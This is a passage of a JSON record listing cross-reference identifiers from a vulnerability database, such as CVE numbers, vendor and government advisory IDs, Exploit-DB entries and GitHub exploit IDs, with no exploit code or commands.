"AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:12F253E0-F6F2-4628-A989-57A36E8C7026", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:184727B8-42D7-4361-B5C7-D262882D9E08", "AKB:1A38FF57-43D7-4AFE-9E56-6A773F2B88AE", "AKB:1DE0ADEC-8107-491A-BC8F-DCC3BF6EB3AB", "AKB:1EB6A6AA-8081-4030-BC12-58CFD5C47668", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:353C2E5C-D0A4-444E-B1B0-B9778B7197F5", "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "AKB:3EC4F6E5-7F60-42EF-9218-009F7538748C", "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "AKB:63C1E977-B118-475C-8C47-1046B294E1BA", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:75573626-39F0-4E95-928D-7603C6E049EF", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:862DFB64-EE07-4F1F-B5F3-8F2C3A560A5F", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:9BE08048-B58F-4ECA-9DF9-EC2241B34B52", "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B669B32B-AB1B-463C-9375-8B727DB33A24", "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "AKB:C2ACFFE9-0D4E-48C9-9099-E5FEBB6401EA", "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "AKB:D87D8B3A-B6C4-4B59-A2EF-577C30171961", "AKB:E152B863-E927-4417-BC7B-1472E48FD3A1", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F05BE8C2-C144-45BE-BF46-5867A2CAAF15", "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799", "AKB:FE22EC16-B49C-437E-B677-8EFFCE66A738"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:1ABE5F69187E5F9F8625DA462772F80C", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:7DAB33D28205885E8979C4C664958CDC", "AVLEONOV:7E0DF6DEBB35FB55F6B4D33A7262A422", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C227E6D768CE965E884A2A9208D66579", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["BLUEKEEP", "BRIGHTMAIL_RESTORE", "CONFLUENCE_MACRO_LFI", "DDE_CLOSEHANDLE_LPE", "EXIM_HEAP_OVERFLOW", "MS12_027", "NETSCALER_TRAVERSAL_RCE", "OWA_RCE", "WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:B2094018923AC88282ED4B94CB24F28B", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:261385", "VU:290915", "VU:490028", "VU:576313", "VU:619785", "VU:766427", "VU:849224", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-129", "CPAI-2012-130", "CPAI-2012-131", "CPAI-2012-132", "CPAI-2012-133", "CPAI-2014-1384", "CPAI-2015-1321", "CPAI-2017-0728", "CPAI-2018-0772", "CPAI-2018-1694", "CPAI-2019-0073", "CPAI-2019-0076", "CPAI-2019-0430", "CPAI-2019-0506", "CPAI-2019-0657", "CPAI-2019-0860", "CPAI-2019-1097", "CPAI-2019-1572", "CPAI-2019-1653", "CPAI-2019-1914", "CPAI-2019-2527", "CPAI-2020-0019", "CPAI-2020-0104", "CPAI-2020-0118", "CPAI-2020-0179", "CPAI-2020-0320", "CPAI-2020-0628", "CPAI-2020-0658", "CPAI-2020-0712", "CPAI-2020-0872", "CPAI-2020-1065", "CPAI-2020-1095"]}, {"type": "checkpoint_security", "idList": ["CPS:SK164716"]}, {"type": "chrome", "idList": ["GCSA-7741258004223335178"]}, {"type": "cisa", "idList": ["CISA:0A6DEB06CFB7BDA5A3D72E0F236C5665", "CISA:134C272F26FB005321448C648224EB02", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:2B970469D89016F563E142BE209443D8", "CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:72803FA1C7CD81E274A0417B0A34353E", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:871444F0026579280090F0A0759442B1", "CISA:8809AF4B96861275A43448FB64E686D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:CB56EF9CA511DD125626482598E6359A", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2012-0158", "CISA-KEV-CVE-2015-4852", "CISA-KEV-CVE-2017-6327", "CISA-KEV-CVE-2018-4939", "CISA-KEV-CVE-2018-6789", "CISA-KEV-CVE-2019-0708", "CISA-KEV-CVE-2019-0803", "CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-11580", "CISA-KEV-CVE-2019-1652", "CISA-KEV-CVE-2019-1653", "CISA-KEV-CVE-2019-16920", "CISA-KEV-CVE-2019-18935", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2019-3396", "CISA-KEV-CVE-2020-0601", "CISA-KEV-CVE-2020-0688", "CISA-KEV-CVE-2020-10189", "CISA-KEV-CVE-2020-1040", "CISA-KEV-CVE-2020-1350", "CISA-KEV-CVE-2020-1472", "CISA-KEV-CVE-2020-15505", "CISA-KEV-CVE-2020-2555", "CISA-KEV-CVE-2020-3118", "CISA-KEV-CVE-2020-5902", "CISA-KEV-CVE-2020-8193", "CISA-KEV-CVE-2020-8195", "CISA-KEV-CVE-2020-8196", "CISA-KEV-CVE-2020-8515", "CISA-KEV-CVE-2022-42475", "CISA-KEV-CVE-2022-47966"]}, {"type": "cisco", "idList": ["CISCO-SA-20190123-RV-INFO", "CISCO-SA-20190123-RV-INJECT", "CISCO-SA-20200205-IOSXR-CDP-RCE"]}, {"type": "citrix", "idList": ["CTX267027", "CTX276688"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:7DA761A6C6FF78EAAABBA6C79E29B2BE"]}, {"type": "cnvd", "idList": ["CNVD-2022-87170"]}, {"type": "cve", "idList": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0685", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-0859", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1032", "CVE-2020-1036", "CVE-2020-1040", "CVE-2020-1041", "CVE-2020-1042", "CVE-2020-1043", "CVE-2020-1350", "CVE-2020-13896", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515", "CVE-2022-42475", "CVE-2022-47966"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1274-1:2DD70", "DEBIAN:DLA-1274-1:F1418", "DEBIAN:DLA-2463-1:1381E", "DEBIAN:DSA-4110-1:E5F9E", "DEBIAN:DSA-4110-1:E8B3F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-6789", "DEBIANCVE:CVE-2020-1472"]}, {"type": "dsquare", "idList": ["E-581", "E-686", "E-688", "E-700", "E-709"]}, {"type": "exploitdb", "idList": ["EDB-ID:42519", "EDB-ID:42613", "EDB-ID:42806", "EDB-ID:44571", "EDB-ID:45671", "EDB-ID:46243", "EDB-ID:46262", "EDB-ID:46655", "EDB-ID:46731", "EDB-ID:46904", "EDB-ID:46920", "EDB-ID:47120", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:47573", "EDB-ID:47793", "EDB-ID:47837", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48153", "EDB-ID:48168", "EDB-ID:48268", "EDB-ID:48320", "EDB-ID:48508", "EDB-ID:48642", "EDB-ID:48711", "EDB-ID:49038", "EDB-ID:49071", "EDB-ID:49465"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0242F3AC3E43042D33450FE96E439DA3", "EXPLOITPACK:028DB84C4840B8D96405811A4FA47345", "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:0519749D0277AA37252F33DA68C2BB93", "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "EXPLOITPACK:151CC13EACB74ED26DB94EB794D08ABD", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:2EB81502D633A85397D825E99A410AAC", "EXPLOITPACK:4639A09DD9AC0CEB700BE689515D2AE7", "EXPLOITPACK:6EC3063003DFEB019CB57306B1F575D0", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC", "EXPLOITPACK:CBE77C73EECE77F0D21EA2908C0F68CF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:D1236C309752040951CA6CF70D1EEE69"]}, {"type": "f5", "idList": ["F5:K25238311", "F5:K30518307", "F5:K93951507", "SOL30518307"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:3B593605DCC5", "FEDORA:4A64830CFCDC", "FEDORA:C80A96015189", "FEDORA:D8A0E3053060"]}, {"type": "filippoio", "idList": ["FILIPPOIO:A761D20DF072FAFAF24F6BC3A68D6AF9"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:38120E3D3979DCD57297419690545DDD", "FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623", "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:D64714BFF80E34308579150D4C839557", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE"]}, {"type": "fortinet", "idList": ["FG-IR-22-398"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "316B3C3E-0E98-11E8-8D41-97657151F8C2"]}, {"type": "gentoo", "idList": ["GLSA-201803-01", "GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A03C474-5159-5D12-82D2-E28FA42B84BB", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0AF42B8A-DF0D-58F8-AB60-9E7C63ED9EEB", "0CFAB531-412C-57A0-BD9E-EF072620C078", "0DE05C29-C117-5BDD-BD53-50EBCC8ED0EB", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "10F73C81-91F0-5199-9C8E-432BF228C96A", "12E44744-1AF0-523A-ACA2-593B4D33E014", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "1741E720-F85A-5179-AB8A-D6FA2E185092", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "190C90D2-4C97-59F5-B1A3-B33DC30ADA82", "19160D73-DC0F-5BE5-85CF-4C7465B538AF", "19F70587-89FB-5855-A578-0E55C3510C59", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "20466D13-6C5B-5326-9C8B-160E9BE37195", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2255B39F-1B91-56F4-A323-8704808620D3", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "27ACD5A9-5233-5B12-9EAA-2894279320B8", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "291B5382-1EED-522B-869C-C2AFDC4AB400", "2A7F5F31-A737-556D-A869-05B87FD1F625", "2A80D982-2C57-5BA2-86CB-6169F3859086", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2D3AD059-4772-527B-A78C-724AFA1B109F", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30863E3B-BC4C-5B00-B21E-E9C67ECF8BA9", "31DB22CD-3492-524F-9D26-035FC1086A71", "328E8BFC-210D-5993-885E-7710FEE734CC", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "370515CC-C819-5D01-917D-2DF4728A28F4", "37D3D343-97C5-5C12-8595-042E337E31C0", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3AFE745D-D706-5B84-B2C7-205590936BBF", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "3F400483-1F7E-5BE5-8612-4D55D450D553", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "462438E9-2947-5006-9134-9BA0BCC1B262", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "46FA259E-5429-580C-B1D5-D1F09EB90023", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "479FD3C0-1269-5BC3-BD67-CDEE0485485A", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "49EC151F-12F0-59CF-960C-25BD54F46680", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4E477E4A-4794-5B4A-8706-915B06422C95", "4FB516B4-0874-5E17-9C4F-8A7BB4481529", "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "52031500-2782-51DA-B154-586E4A0857F6", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "560405C4-4806-5173-B662-F9C3D776D8D4", "58F1E19B-12E9-5FE1-90C6-14688FEE3C8C", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5DD13827-3FCE-5166-806D-088441D41514", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "5F6BE6F7-C220-5BDD-BE92-A5156F21A1B2", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "637FA72A-45F0-5611-85EB-A28965CFDB93", "63C36F7A-5F99-5A79-B99F-260360AC237F", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "66506397-D518-518F-B4A6-3C3F99602E30", "6787DC40-24C2-5626-B213-399038EFB0E9", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "6B67D619-5DD1-507C-9028-561DC01DC062", "6CA1F5F4-917A-534B-9ED6-6065C00689AF", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "721C46F4-C390-5D23-B358-3D4B22959428", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "757B9105-ADEF-5B27-8B1F-A06AE0566065", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77A82210-BA24-58B5-8539-C0177DA9E1FB", "78155987-ACB5-51CD-99EB-FF372456D94D", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "7F937E02-A1B2-5F78-B140-90BC298729D4", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "830986C7-0D62-5E59-B6E2-647821C4FF8B", "84FC95F2-00DB-57F5-A2B1-DE1C4D9C77E1", "851959DE-3B5C-5317-868E-5D80E801E3B0", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "88373793-9076-5F05-BDBB-635A7E1BD897", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "8C937DCD-4090-5A44-9361-4D9ECF545843", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "92BBBF7B-026E-553A-883B-AEF503046C18", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "9363B01D-88F0-50D6-8F88-0AFC9D043F98", "939F3BE7-AF69-5351-BD56-12412FA184C5", "93EEDE73-1DB4-5905-BCAB-CDC6F98831CD", "94095106-8E25-54E1-924C-2C3B4E99610F", "988A0BAB-669A-57AE-B432-564B2E378252", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9C32E281-E6FB-587D-9ECC-F961B7082D43", "9C9BD402-511C-597D-9864-647131FE6647", "9D170C46-A745-5692-BA84-67EBFEA037FF", "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "9DE76D04-93D7-5923-9AE3-457D591197D6", "9FE15986-BAC9-5740-8189-23E26F8399D5", "A04C30E0-722D-5CF4-B80A-547C1C702024", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A37C8010-D2C6-52F5-9079-96E8A538B6CA", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A43D1B77-D6EF-5570-AF16-6320A544CE0A", "A48A7BCD-4B97-5BDB-A571-3B8DF0069FB9", "A4E7A7FA-3876-5263-8290-CAB45A4A2F1F", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A4F881D3-85FA-580E-9465-AA77CE5B7390", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "A839FA86-0873-592C-AA31-2C445B4C4F29", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "A96AA4B1-C8BB-579A-8D24-BC5F3628A0A4", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AAC2853C-A655-5E80-9262-A654102B874A", "AC37CED9-818C-542C-BAD9-82114E6777F8", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B1A093D5-DAEC-57BA-A723-6130A7AE0631", "B2FBA40E-C397-5DC8-8BF4-FA5BCB824172", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B417316F-A794-5234-BC9E-475C438FC35C", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BA88BFF6-7FE4-5A12-9372-60C742865CD5", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BE90B1DD-521D-540C-8554-5454779256A5", "BEDCA78A-B03B-5065-AB50-3AC902332B03", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C0A0F6D6-A203-5F8D-819A-40B5B23B0223", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C4A73F14-7DA7-5DD3-9E88-8F6FDC90FA45", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CB69BCC3-2317-5740-8B01-4F6F0D320AC3", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D166D6FD-186D-5EE5-951A-8AB30D45EA32", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7AB3F4A-8E41-5E5B-B987-99AFB571FE9C", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "D93AD4F3-228E-5F05-A21F-9D852E25F569", "D9F4E530-0286-50D1-AF79-6685665ED776", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DD3676BD-E792-5189-86EE-4765FF68EFCB", "DE558F67-26A7-5F03-AD15-C2087B81E69F", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DEF06C66-815B-54B3-A5CC-951F37453002", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EBBEA4C3-D6F9-53AF-BBE9-D3438C945AB4", "EBF17036-7547-54B5-B0D6-B465FE6C9873", 